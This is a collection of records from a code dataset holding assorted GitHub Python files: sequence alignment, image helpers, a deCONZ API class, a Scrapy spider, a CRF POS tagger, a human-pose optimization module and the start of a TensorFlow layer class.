string:\")\n#V=\"CGTGACTGGCTGATACTTTCTCCGTTATCCCTGTTCATTACAAATATATTAAAAGCGCTACCTGTGCTATTCATTTAGCCTCTCCCTCGTCGCCTAGGAACGTGAGAAGGGAAGCGAGATTCTAACCACGCACCGAGCTTCAGTGTACATCGGTACATCGTTACGGCATCCCTGATTTAAAGACGAAGTATGTTAAGCATCGGGCCGTGCGCTTGGCAGAGAAGTAATCGGGATGTAGCCGAAAAGGTTAGCACAGACTAGTCAGAAATCGTGTATTGCCTAAGCACTAAGAGAACGTGAAAGACCCGTATCGAGGGACAAGGGCACGGAAGTTAACACGACAGGGAAGGTCTCCCGCAGCTACCGCTATTATGGTGCCAGACAGGCGATATTTCCAGGACGCTGGTTAGTGCTTGGGAGAACGAGCGCAATATTTTTTGATGCTTCCATATCGACCAATTAATGACAATTTTAGATCCGGCACTCACCCTAGGCGGAGTCCATGAACTAAGGAATTCCAGCTGCTATTGCACCACCAATAATGACGTTCATTAGTGACGGAGCAAAGTGTGTTGTATCGTTAATGGTTATTTTCATGGGCTGTACATTAGGCGTAAGACCTAGCGGTAGGGCTGCTTTATGCAGGTACTCCCGTACTGAACAATAGCTACATCTGTTCGAGGACTCTCTGGGACCCTCCGTCCCCAGATCGAAGACCCCGACAGCAATACGTACACGAGTTTTTCCTGGCATTATCCTTAAGAATCAATGTGTCCAATCTTCTTCCTTTAATGCAGTAGAACGGTAGTGCGGGGGACGTGGATCCCTGGTGTGTTGGACTTGAAAGACTTGGTCGTTACTCCTTTGGATATCCG\"\n#W=\"GCAACTATCTACAGACCATAGGCAGAGGTCCATCGTGTACGTACAAGACTCTCGATCCCGGTTTTTTAAAGGGGAAAGCAAATGT\"\n#V=\"GTAGGCTTAAGGTTA\"\n#W=\"TAGATA\"\nBacktrack, n, m = LCSBackTrack(V, W)\n#print(Backtrack,n,m)\nprint(V[:n],W,n-1,m-1)\n\nprint('\\n'.join(OutputLCS(Backtrack,V[:n],W,n-1,m-1)))\n\n","repo_name":"Hydebutterfy/learn-python","sub_path":"Comparing Genes, Proteins, and Genomes/Fitting Alignment Problem-低级版.py","file_name":"Fitting Alignment Problem-低级版.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"25401617082","text":"import cv2\nimport numpy as np\n\ndef imdecode(data):\n    if isinstance(data, bytes):\n        data = np.fromstring(data, np.uint8)\n    img = cv2.imdecode(data, cv2.IMREAD_UNCHANGED)\n    return img[...,::-1]\n\ndef imread(filename):\n    img = cv2.imread(filename, cv2.IMREAD_UNCHANGED)\n    return img[...,::-1]\n\ndef imwrite(filename, img):\n    if img is not None:\n        if len(img.shape) > 2:\n            img = img[...,::-1]\n        return cv2.imwrite(filename, img)\n\ndef safe_crop(arr, tblr, fill=None):\n    n,s,w,e = tblr\n    shape = np.asarray(arr.shape)\n    shape[:2] = s - n, e - w\n    no, so, wo, eo = 0, shape[0], 0, shape[1]\n    if n < 0:\n        no += -n\n        n = 0\n    if w < 0:\n        wo += -w\n        w = 0\n    if s >= arr.shape[0]:\n        so -= s - arr.shape[0]\n        s = arr.shape[0]\n    if e >= 
arr.shape[1]:\n eo -= e - arr.shape[1]\n e = arr.shape[1]\n cropped = arr[n:s,w:e]\n if fill is None:\n return cropped\n out = np.empty(shape, dtype=arr.dtype)\n out.fill(fill)\n try:\n out[no:so,wo:eo] = cropped\n except ValueError:\n # this happens when there is no overlap\n pass\n return out","repo_name":"lmccart/vibe-check","sub_path":"face/imutil.py","file_name":"imutil.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"2672206469","text":"\"\"\"API base class.\"\"\"\n\nfrom collections.abc import Callable\nimport logging\nfrom typing import TYPE_CHECKING, Any\n\nif TYPE_CHECKING:\n from . import ResourceGroup\n\nLOGGER = logging.getLogger(__name__)\n\nSubscriptionType = Callable[..., None]\nUnsubscribeType = Callable[[], None]\n\n\nclass APIItem:\n \"\"\"Base class for a deCONZ API item.\"\"\"\n\n resource_group: \"ResourceGroup\"\n\n def __init__(self, resource_id: str, raw: Any) -> None:\n \"\"\"Initialize API item.\"\"\"\n self.resource_id = resource_id\n self.raw = raw\n\n self.changed_keys: set[str] = set()\n\n self._callbacks: list[SubscriptionType] = []\n self._subscribers: list[SubscriptionType] = []\n\n @property\n def deconz_id(self) -> str:\n \"\"\"Id to call device over API e.g. /sensors/1.\"\"\"\n return f\"/{self.resource_group.value}/{self.resource_id}\"\n\n def register_callback(self, callback: SubscriptionType) -> None:\n \"\"\"Register callback for signalling.\"\"\"\n self._callbacks.append(callback)\n\n def remove_callback(self, callback: SubscriptionType) -> None:\n \"\"\"Remove callback previously registered.\"\"\"\n if callback in self._callbacks:\n self._callbacks.remove(callback)\n\n def subscribe(self, callback: SubscriptionType) -> UnsubscribeType:\n \"\"\"Subscribe to events.\n\n Return function to unsubscribe.\n \"\"\"\n self._subscribers.append(callback)\n\n def unsubscribe() -> None:\n \"\"\"Unsubscribe callback.\"\"\"\n self._subscribers.remove(callback)\n\n return unsubscribe\n\n def update(self, raw: dict[str, dict[str, Any]]) -> None:\n \"\"\"Update input attr in self.\n\n Store a set of keys with changed values.\n \"\"\"\n changed_keys = set()\n\n for k, v in raw.items():\n changed_keys.add(k)\n\n if isinstance(self.raw.get(k), dict) and isinstance(v, dict):\n changed_keys.update(set(v.keys()))\n self.raw[k].update(v)\n\n else:\n self.raw[k] = v\n\n self.changed_keys = changed_keys\n\n for callback in self._callbacks + self._subscribers:\n callback()\n","repo_name":"Kane610/deconz","sub_path":"pydeconz/models/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"14487162595","text":"import scrapy\n\n\nclass TjSpider(scrapy.Spider):\n name = 'tj'\n # allowed_domains = ['tiaoji.com']\n start_urls = ['http://www.chinakaoyan.com/tiaoji/schoollist/pagenum/1.shtml']\n\n def parse(self, response):\n links = response.xpath('//span[@class=\"title\"]/a/@href').getall()\n for link in links:\n # print(link)\n yield response.follow(url=link, callback=self.parse_detail)\n pages = response.xpath('//div[@class=\"dajax\"]/a/@href').getall()\n if pages:\n for one_page in pages:\n yield response.follow(url=one_page, callback=self.parse)\n\n def parse_detail(self, response):\n title = response.xpath('//div[@class=\"t-header\"]/h1/text()').get()\n s_name = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item 
font16\"][1]/span[@class=\"name sw\"]/text()').get()\n\n loc = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][1]/span[@class=\"num\"]/text()').get()\n # print(title, s_name, loc)\n zhuanye = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][2]/span[@class=\"name sw\"]/text()').get()\n gonfei_num = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][2]/span[@class=\"num\"]/text()').get()\n # print(zhuanye, gonfei_num)\n release_time = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][3]/span[@class=\"name sw\"]/text()').get()\n end_time = response.xpath('//div[@class=\"student-info\"]/div[@class=\"s-item font16\"][3]/span[@class=\"num\"]/text()').get()\n # print(release_time, end_time)\n content_li = response.xpath('//div[@class=\"student-body font14\"]/p//text()').getall()\n content = '_'.join(x.strip() for x in content_li)\n # print(content)\n\n item = {}\n item['title'] = title\n item['s_name'] = s_name\n item['loc'] = loc\n item['zhuanye'] = zhuanye\n item['gonfei_num'] = gonfei_num\n item['release_time'] = release_time\n item['end_time'] = end_time\n item['content'] = content\n yield item","repo_name":"ykallan/chinakaoyan_school_info","sub_path":"zhongguokaoyanwang/spiders/tj.py","file_name":"tj.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"452778998","text":"#coding=utf8\n'''\nCreated on 2017-6-6\n\n@author: xuwei\n\n@summary: 任务管理器\n'''\nimport time\nimport tasks\nfrom timer import Wheel\nfrom timer.logger import Logger\n\nclass TaskManager(Logger):\n def __init__(self):\n Logger.__init__(self)\n self.tasks = {}\n self.Wheel = Wheel()\n \n def load_task(self):\n reload(tasks)\n for taskname in tasks.runtasks:\n if taskname not in self.tasks:\n try:\n self.tasks[taskname] = tasks.runtasks[taskname]\n module = __import__(taskname)\n self.Wheel.add_task(module, taskname, **tasks.runtasks[taskname])\n except:\n errmsg = self.get_error_message()\n self.logger.error(errmsg)\n time.sleep(3)\n else:\n if self.tasks[taskname] != tasks.runtasks[taskname]:\n try:\n self.Wheel.update_time(taskname, **tasks.runtasks[taskname])\n except:\n errmsg = self.get_error_message()\n self.logger.error(errmsg)\n \n def run(self):\n self.load_task()\n self.Wheel.start()\n time.sleep(10)\n while 1:\n try:\n self.load_task()\n except:\n errmsg = self.get_error_message()\n self.logger.error(errmsg)\n time.sleep(10)\n \nif __name__ == \"__main__\":\n TS = TaskManager()\n TS.run()\n \n","repo_name":"mudou192/TimerTask","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"6527121791","text":"import torch\nimport torch.nn as nn\nimport os\nimport numpy as np\nfrom loguru import logger as guru\nfrom llib.optimizer.build import build_optimizer\nfrom llib.training.fitter import Stopper\nfrom pytorch3d.transforms import axis_angle_to_matrix, matrix_to_axis_angle\n\nclass HHCSOpti(nn.Module):\n \"\"\"HHC optimizes two meshes using image keypoints and discrete\n contact labels.\"\"\"\n def __init__(self,\n opti_cfg,\n camera,\n body_model_h1,\n body_model_h2,\n criterion,\n batch_size=1,\n device='cuda',\n diffusion_module=None,\n renderer=None\n ):\n super(HHCSOpti, self).__init__()\n\n # save config file\n self.opti_cfg = opti_cfg\n self.batch_size = 
batch_size\n self.device = device\n self.print_loss = opti_cfg.print_loss\n self.render_iters = opti_cfg.render_iters\n\n self.camera = camera\n\n self.body_model_h1 = body_model_h1\n self.body_model_h2 = body_model_h2\n self.faces = torch.from_numpy(\n body_model_h1.faces.astype(np.int32)).to(self.device)\n\n self.diffusion_module = diffusion_module\n\n # human optimization\n self.criterion = criterion\n self.num_iters = opti_cfg.hhcs.max_iters\n\n # parameters to be optimized\n self.optimizables = {\n 0: [\n 'body_model_h1.transl',\n 'body_model_h1.betas',\n 'body_model_h1.body_pose',\n # 'body_model_h1.global_orient',\n 'body_model_h2.transl',\n 'body_model_h2.betas',\n 'body_model_h2.body_pose',\n # 'body_model_h2.global_orient',\n ], \n 1: [\n 'body_model_h1.transl',\n 'body_model_h1.body_pose',\n 'body_model_h2.transl',\n 'body_model_h2.body_pose',\n ],\n } \n\n # if bev guidance also optimize the body global orientation \n # if len(self.diffusion_module.exp_cfg.guidance_params) > 0:\n # self.optimizables[0].extend([\n # 'body_model_h1.global_orient',\n # 'body_model_h2.global_orient',\n # ])\n \n\n # stop criterion \n self.stopper = Stopper(\n num_prev_steps=opti_cfg.hhcs.num_prev_steps,\n slope_tol=opti_cfg.hhcs.slope_tol,\n )\n\n # rendered images per iter\n if self.render_iters:\n self.renderer = renderer\n self.renderings = []\n\n def setup_optimiables(self, stage):\n \n self.final_params = [] \n\n optimizer_type = self.opti_cfg.optimizer.type\n lr = stage_lr = eval(f'self.opti_cfg.optimizer.{optimizer_type}.lr')\n if stage in [1]:\n stage_lr = lr / 10\n\n # camera parameters\n for param_name, param in self.named_parameters():\n if param_name in self.optimizables[stage]:\n param.requires_grad = True\n self.final_params.append({'params': param, 'lr': stage_lr})\n else:\n param.requires_grad = False\n \n @torch.no_grad()\n def fill_params(self, init_human, init_cam):\n \"\"\"Fill the parameters of the human model and camera with the\n initial values.\"\"\"\n\n device = self.body_model_h1.betas.device\n for param_name, param in self.body_model_h1.named_parameters():\n if param_name in init_human.keys():\n init_value = init_human[param_name][[0]].clone().detach().to(device).requires_grad_(True)\n param[:] = init_value\n\n for param_name, param in self.body_model_h2.named_parameters():\n if param_name in init_human.keys():\n init_value = init_human[param_name][[1]].clone().detach().to(device).requires_grad_(True)\n param[:] = init_value\n\n for param_name, param in self.camera.named_parameters():\n if param_name in init_cam.keys():\n init_value = init_cam[param_name].clone().detach().unsqueeze(0).to(device).requires_grad_(True)\n param[:] = init_value\n\n self.camera.iw[:] = init_cam['iw']\n self.camera.ih[:] = init_cam['ih'] \n\n\n def setup_optimizer(self, init_human, init_cam, stage):\n \"\"\"Setup the optimizer for the current stage / reset in stages > 0.\"\"\"\n\n # in the first stage, set the SMPL-X parameters to the initial values \n if stage == 0:\n self.fill_params(init_human, init_cam)\n\n # pick the parameters to be optimized\n self.setup_optimiables(stage)\n\n # build optimizer\n self.optimizer = build_optimizer(\n self.opti_cfg.optimizer, \n self.opti_cfg.optimizer.type,\n self.final_params\n )\n\n def print_losses(self, ld, stage=0, step=0, abbr=True):\n \"\"\"Print the losses for the current stage.\"\"\"\n total_loss = ld['total_loss'].item()\n out = f'Stage/step:{stage:2d}/{step:2} || Tl: {total_loss:.4f} || '\n for k, v in ld.items():\n if k != 'total_loss':\n kprint 
= ''.join([x[0] for x in k.split('_')]) if abbr else k\n if type(v) == torch.Tensor:\n v = v.item()\n out += f'{kprint}: {v:.4f} | '\n print(out)\n \n def render_current_estimate(self, stage=\"\", iter=\"\", color=['light_blue3', 'light_blue5']):\n \"\"\"Render the current estimates\"\"\"\n\n v1 = self.body_model_h1().vertices.detach()\n v2 = self.body_model_h2().vertices.detach()\n verts = torch.cat([v1,v2], dim=0)\n\n bm = 'smpl' if verts.shape[1] == 6890 else 'smplx'\n self.renderer.update_camera_pose(\n self.camera.pitch.item(), self.camera.yaw.item(), self.camera.roll.item(), \n self.camera.tx.item(), self.camera.ty.item(), self.camera.tz.item()\n )\n rendered_img = self.renderer.render(verts, self.faces, colors = color, body_model=bm)\n color_image = rendered_img[0].detach().cpu().numpy() * 255\n self.renderings.append(color_image)\n\n\n def optimize_humans(\n self,\n #init_h1, \n #init_h2, \n init_human,\n init_camera,\n contact_map,\n stage,\n guidance_params={},\n ): \n \"\"\"Optimize the human parameters for the given stage.\"\"\"\n\n # set the loss weights for the current stage\n self.criterion.set_weights(stage)\n\n for i in range(self.num_iters[stage]):\n \n if self.render_iters:\n colors = {0: ['paper_blue', 'paper_red'], 1: ['paper_blue', 'paper_red']}\n self.render_current_estimate(stage, i, colors[stage])\n\n smpl_output_h1 = self.body_model_h1()\n smpl_output_h2 = self.body_model_h2()\n camera = self.camera\n\n # we tried different approaches / noies levels when using the SDS loss\n if self.opti_cfg.use_diffusion:\n if self.opti_cfg.sds_type == \"fixed\":\n # use fixed value for noise level t\n t_i = self.opti_cfg.sds_t_fixed\n elif self.opti_cfg.sds_type == \"range\":\n # sample random integer between range lower and upper bound\n t_min, t_max = self.opti_cfg.sds_t_range\n t_i = np.random.randint(t_min, t_max, 1)[0]\n elif self.opti_cfg.sds_type == \"adaptive\":\n # change noise level based on iteration\n p = (self.num_iters[stage] - (i+1)) / self.num_iters[stage]\n pidx = int(np.where(np.array(self.opti_cfg.sds_t_adaptive_i) > p)[0][-1])\n t_i = self.opti_cfg.sds_t_adaptive_t[pidx]\n else:\n # without SDS loss, set t to None\n t_i = None\n\n # compute all loss\n loss, loss_dict = self.criterion(\n smpl_output_h1, \n smpl_output_h2, \n camera,\n #init_h1, \n #init_h2,\n init_human,\n init_camera,\n contact_map,\n use_diffusion_prior=self.opti_cfg.use_diffusion,\n diffusion_module=self.diffusion_module,\n t=t_i,\n guidance_params=guidance_params,\n )\n\n if self.print_loss:\n self.print_losses(loss_dict, stage, i)\n\n # optimizer step\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # break if stopping criterion is met\n stop_crit = self.stopper.check(loss.item())\n if stop_crit:\n break\n\n def fit(\n self, \n #init_h1, \n #init_h2,\n init_human,\n init_camera,\n contact_map,\n ): \n \"\"\"Main fitting function running through all stages of optimization\"\"\"\n\n # we project the initial mesh to the image plane and use the keypoints \n # if they're not visible in the image\n with torch.no_grad():\n self.fill_params(init_human, init_camera)\n init_human['init_keypoints'] = torch.cat([\n self.camera.project(self.body_model_h1().joints),\n self.camera.project(self.body_model_h2().joints)], axis=0)\n\n # copy init human params for guidance\n #guidance_params = {k: v.clone().detach() for k, v in init_human.items()}\n guidance_params = {}\n if self.diffusion_module is not None:\n if len(self.diffusion_module.exp_cfg.guidance_params) > 0:\n dbs = 
self.diffusion_module.bs\n guidance_params = {\n 'orient': init_human['global_orient'].unsqueeze(0).repeat(dbs, 1, 1),\n 'pose': init_human['body_pose'].unsqueeze(0).repeat(dbs, 1, 1),\n 'shape': torch.cat((init_human['betas'], init_human['scale'].unsqueeze(1)), dim=-1).unsqueeze(0).repeat(dbs, 1, 1),\n 'transl': init_human['transl'].unsqueeze(0).repeat(dbs, 1, 1)\n }\n guidance_params = self.diffusion_module.cast_smpl(guidance_params)\n guidance_params = self.diffusion_module.split_humans(guidance_params)\n #else:\n # guidance_params = {} # no guidance params are used here\n\n\n def undo_orient_and_transl(diffusion_module, x_start_smpls, target_rotation, target_transl):\n \n #orient, cam_rotation\n global_orient_h0 = x_start_smpls[0].global_orient.unsqueeze(1) #.repeat(64,1,1)\n global_orient_h1 = x_start_smpls[1].global_orient.unsqueeze(1) #.repeat(64,1,1)\n param = torch.cat((global_orient_h0, global_orient_h1), dim=1)\n param_rotmat = axis_angle_to_matrix(param)\n cam_rotation = torch.einsum('bml,bln->bmn', target_rotation, param_rotmat[:, 0, :, :].transpose(2, 1))\n new_orient = matrix_to_axis_angle(torch.einsum('bnm,bhml->bhnl', cam_rotation, param_rotmat))\n new_orient=new_orient[[0],:,:]\n\n pelvis = torch.cat((\n diffusion_module.body_model(betas=x_start_smpls[0].betas, scale=x_start_smpls[0].scale).joints[:,[0],:],\n diffusion_module.body_model(betas=x_start_smpls[1].betas, scale=x_start_smpls[1].scale).joints[:,[0],:]\n ), dim=1)\n\n transl_h0 = x_start_smpls[0].transl.unsqueeze(1) #.repeat(64,1,1)\n transl_h1 = x_start_smpls[1].transl.unsqueeze(1) #.repeat(64,1,1)\n transl = torch.cat((transl_h0, transl_h1), dim=1)\n root_transl = transl[:,[0],:]\n cam_translation = (-1 * torch.einsum('bhn,bnm->bhm', target_transl + pelvis, cam_rotation)) + root_transl + pelvis\n xx = transl + pelvis - cam_translation\n new_transl = torch.einsum('bhn,bnm->bhm', xx, cam_rotation.transpose(2, 1)) - pelvis\n new_transl=new_transl[[0],:,:]\n\n return new_orient, new_transl\n\n ############ conditional sampling ##############\n if len(guidance_params) > 0:\n # guru.info('Start sampling unconditional')\n cond_ts = np.arange(1, self.diffusion_module.diffusion.num_timesteps, 100)[::-1]\n log_freq = cond_ts.shape[0] # no logging\n x_ts, x_starts = self.diffusion_module.sample_from_model(\n cond_ts, log_freq, guidance_params\n )\n # undo orient and transl\n init_rotation = axis_angle_to_matrix(init_human['global_orient'][0]).detach().clone().repeat(dbs, 1, 1)\n init_transl = init_human['transl'][0].detach().clone().repeat(dbs, 1, 1)\n new_orient, new_transl = undo_orient_and_transl(\n self.diffusion_module, x_starts['final'], init_rotation, init_transl\n )\n for i in range(2):\n for param in ['global_orient', 'body_pose', 'betas', 'transl', 'scale']:\n if param == 'global_orient':\n init_human[param][i] = new_orient[0][i]\n elif param == 'transl':\n init_human[param][i] = new_transl[0][i]\n else:\n i_param = x_starts['final'][i]\n init_human[param][i] = eval(f'i_param.{param}')[0].detach().clone()\n\n # we project the initial mesh to the image plane and use the keypoints \n # if they're not visible in the image\n with torch.no_grad():\n self.fill_params(init_human, init_camera)\n init_human['init_keypoints'] = torch.cat([\n self.camera.project(self.body_model_h1().joints),\n self.camera.project(self.body_model_h2().joints)], axis=0) \n\n # optimize in multiple stages\n for stage, _ in enumerate(range(len(self.num_iters))):\n guru.info(f'Starting with stage: {stage} \\n')\n\n self.stopper.reset() # 
stopping criterion\n self.setup_optimizer(init_human, init_camera, stage) # setup optimizer\n\n # clone the initial estimate and detach it from the graph since it'll be used\n # as initialization and as prior the optimization\n if stage > 0:\n init_human['body_pose'] = torch.cat([\n self.body_model_h1.body_pose.detach().clone(),\n self.body_model_h2.body_pose.detach().clone()\n ], axis=0)\n init_human['betas'] = torch.cat([\n self.body_model_h1.betas.detach().clone(),\n self.body_model_h2.betas.detach().clone()\n ], axis=0)\n \n # run optmization for one stage\n self.optimize_humans(init_human, init_camera, contact_map, stage, guidance_params)\n \n # Get final loss value and get full skinning\n with torch.no_grad():\n smpl_output_h1 = self.body_model_h1()\n smpl_output_h2 = self.body_model_h2()\n\n return smpl_output_h1, smpl_output_h2\n","repo_name":"muelea/buddi","sub_path":"llib/methods/hhcs_optimization/fit_module.py","file_name":"fit_module.py","file_ext":"py","file_size_in_byte":15201,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"37"} +{"seq_id":"6187232316","text":"\"\"\" Misc functions that can be used to debug crap \"\"\"\nimport os \nfrom lib import libtcodpy as libtcod\n\ndef print_all_chars():\n font_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'assets/terminal8x8_aa_as.png')\n libtcod.console_set_custom_font(font_path, libtcod.FONT_TYPE_GREYSCALE | libtcod.FONT_LAYOUT_ASCII_INCOL)\n libtcod.console_init_root(25, 80, 'Printing all characters', False)\n\n while not libtcod.console_is_window_closed():\n libtcod.console_set_default_foreground(0, libtcod.white)\n j = 0\n i = 1\n for x in xrange(700):\n libtcod.console_put_char(0, i, j, x)\n j += 2\n if j > 80:\n i += 2\n j = 0\n\n libtcod.console_put_char(0, i + 2, 1, 247)\n libtcod.console_flush()\n\nif __name__ == '__main__':\n print_all_chars()\n ","repo_name":"bradykieffer/progue","sub_path":"progue/debug/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15433873286","text":"import re\nimport unicodedata\nimport pycrfsuite\n\n_model_file = 'model.crf.tagger'\n\ndef _get_features(tokens, idx):\n \"\"\"\n Extract basic features about this word including \n - Current Word \n - Is Capitalized ?\n - Has Punctuation ?\n - Has Number ?\n - Suffixes up to length 3\n Note that : we might include feature over previous word, next word ect. \n \n :return : a list which contains the features\n :rtype : list(str) \n \n \"\"\" \n token = tokens[idx]\n \n feature_list = [] \n # Capitalization \n if token[0].isupper():\n feature_list.append('CAPITALIZATION')\n \n # Number \n if re.search(re.compile(r\"\\d\"), token) is not None:\n feature_list.append('HAS_NUM') \n \n # Punctuation\n punc_cat = set([\"Pc\", \"Pd\", \"Ps\", \"Pe\", \"Pi\", \"Pf\", \"Po\"])\n if all (unicodedata.category(x) in punc_cat for x in token):\n feature_list.append('PUNCTUATION')\n \n # Suffix up to length 3\n if len(token) > 1:\n feature_list.append('SUF_' + token[-1:]) \n if len(token) > 2: \n feature_list.append('SUF_' + token[-2:]) \n if len(token) > 3: \n feature_list.append('SUF_' + token[-3:])\n \n feature_list.append('WORD_' + token )\n \n return feature_list\n\ndef tag_sents(sents):\n '''\n Tag a list of sentences. 
NB before using this function, user should specify the mode_file either by \n - Train a new model using ``train'' function \n - Use the pre-trained model which is set via ``set_model_file'' function \n :params sentences : list of sentences needed to tag. \n :type sentences : list(list(str))\n :return : list of tagged sentences. \n :rtype : list (list (tuple(str,str))) \n '''\n if _model_file == '':\n raise Exception(' No model file is found !! Please use train or set_model_file function')\n \n\n tagger = pycrfsuite.Tagger()\n tagger.open(_model_file) \n # We need the list of sentences instead of the list generator for matching the input and output\n result = [] \n for tokens in sents:\n features = [_get_features(tokens,i) for i in range(len(tokens))]\n labels = tagger.tag(features)\n \n if len(labels) != len(tokens):\n raise Exception(' Predicted Length Not Matched, Expect Errors !')\n \n tagged_sent = list(zip(tokens,labels))\n result.append(tagged_sent)\n \n return result \n\nl = [['học_sinh', 'học', 'sinh_học'],['học_sinh', 'học', 'ăn', '.']]\nprint(tag_sents(l))\n\n","repo_name":"trinhvanminh/VN-POS-tagging","sub_path":"old/tag_sents.py","file_name":"tag_sents.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70243334133","text":"def solution(strings, n):\n answer = []\n index = dict()\n arr1 = []\n for i in strings:\n index[i] = i[n]\n arr1.append(i[n])\n arr = list(set(arr1))\n arr.sort()\n for j in arr:\n emp = []\n for k in index:\n if index[k] == j: emp.append(k)\n emp.sort()\n answer.extend(emp)\n \n return answer\n \n \ndef solution(strings, n):\n answer = []\n for i in range(len(strings)):\n strings[i] = strings[i][n] + strings[i]\n strings.sort() \n for j in strings:\n answer.append(j[1:])\n return answer\n","repo_name":"FlowerLSH/Study1","sub_path":"문자열 마음데로 정렬하기.py","file_name":"문자열 마음데로 정렬하기.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9445682620","text":"from generic_online_ml_scoring.builder import ConsumerTransformerProducerLoop\nfrom generic_online_ml_scoring.builder import GenericModel\nimport math\n\n\nclass SquareAllIntPropsModel(GenericModel):\n def __init__(self):\n print(\"Initialization of model\")\n\n def execute(self, data):\n for key in data:\n yield {\n \"key\": key,\n \"value\": math.pow(int(data[key]), 2)\n }\n\n\nconfig_path = \"../data/testconfig.conf\"\n\nloop = ConsumerTransformerProducerLoop(config_path)\nloop.submit_model(SquareAllIntPropsModel())\nloop.start()\n\n\n","repo_name":"nbchn/online-ml-scoring-kafka","sub_path":"examples/example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73039185013","text":"\nimport tensorflow as tf\nfrom TFUtil import Data, OutputWithActivation\n\n\nclass LayerBase(object):\n layer_class = None\n recurrent = False\n\n def __init__(self, name, network, n_out=None, out_type=None, sources=(),\n target=None, loss=None, loss_opts=None, L2=None, is_output_layer=None,\n trainable=True):\n \"\"\"\n :param str name:\n :param TFNetwork.TFNetwork network:\n :param None|int n_out: output dim\n :param dict[str] out_type: kwargs for Data class. more explicit than n_out.\n :param list[LayerBase] sources:\n :param str|None target: if some loss is set, this is the target data-key, i.e. 
network.extern_data.get_data(target)\n alternatively, this also can be a layer name.\n :param str|None loss: if set, via get_loss\n :param dict[str]|None loss_opts: kwargs for Loss class, if loss is set\n :param float|None L2: for constraints\n :param bool|None is_output_layer:\n :param bool trainable: mostly ignored for now...\n \"\"\"\n self.name = name\n self.network = network\n if loss and not target:\n target = self.network.extern_data.default_target\n self.target = target\n self.loss = None # type: Loss\n if loss:\n loss_class = get_loss_class(loss)\n self.loss = loss_class(**(loss_opts or {}))\n if self.loss.recurrent:\n self.recurrent = True\n if out_type is None and n_out is None and target:\n n_out = self._get_target_value(mark_data_key_as_used=False).dim\n if self.loss:\n n_out = self.loss.get_auto_output_layer_dim(n_out)\n if out_type is None:\n assert n_out\n out_type = {\"dim\": n_out}\n out_type = out_type.copy()\n out_type.setdefault(\"name\", \"%s_output\" % self.name)\n if n_out is not None:\n out_type.setdefault(\"dim\", n_out)\n assert out_type[\"dim\"] == n_out\n # You are supposed to set self.output.{batch_dim_axis,time_dim_axis} explicitly,\n # as well as check the inputs if they are as you would suggest.\n # However, a good default is often to use the same as the input.\n if sources and \"batch_dim_axis\" not in out_type:\n out_type.setdefault(\"batch_dim_axis\", sources[0].output.batch_dim_axis)\n out_type.setdefault(\"time_dim_axis\", sources[0].output.time_dim_axis)\n self.output = Data(**out_type)\n # You are supposed to set self.output.placeholder to the value which you want to return by the layer.\n # Normally you are also supposed to set self.output.size_placeholder explicitly, just like self.output.placeholder.\n # However, in many cases, this will just be {0: time-lengths} and the same as from the input.\n # We check for this case and preset it by that if possible.\n # If you want to have it different in your layer, just overwrite it.\n if sources and sources[0].output.matches_dim_pattern(self.output):\n self.output.size_placeholder = sources[0].output.size_placeholder.copy()\n self.output_before_activation = None # type: None|OutputWithActivation\n self.sources = sources\n self.params = {} # type: dict[str,tf.Variable]\n self.L2 = L2\n self._is_output_layer = is_output_layer\n self.trainable = trainable\n # Stats will be collected by the engine.\n self.stats = {} # type: dict[str,tf.Tensor]\n\n def __repr__(self):\n return \"%s{class=%s, out_type=%s}\" % (\n self.name, self.layer_class, self.output.get_description(with_name=False))\n\n @classmethod\n def cls_get_tf_scope_name(cls, name):\n \"\"\"\n :param str name: layer name\n :return: scope name, might be just name\n \"\"\"\n return name.replace(\":\", \"__\")\n\n @property\n def tf_scope_name(self):\n return self.cls_get_tf_scope_name(name=self.name)\n\n def is_output_layer(self):\n \"\"\"\n Some code differs between an output layer and other layers.\n It is a bit arbitrary what we define as output layer.\n :rtype: bool\n \"\"\"\n if self._is_output_layer is not None:\n return self._is_output_layer\n if self.target:\n return True\n if self.name == \"output\":\n return True\n return False\n\n def add_param(self, param):\n \"\"\"\n :param tf.Variable param:\n :return: param\n :rtype tf.Variable\n \"\"\"\n assert param.name\n self.params[param.name] = param\n return param\n\n def set_param_values_by_dict(self, values_dict, session):\n \"\"\"\n :param dict[str,numpy.ndarray] values_dict:\n :param tf.Session 
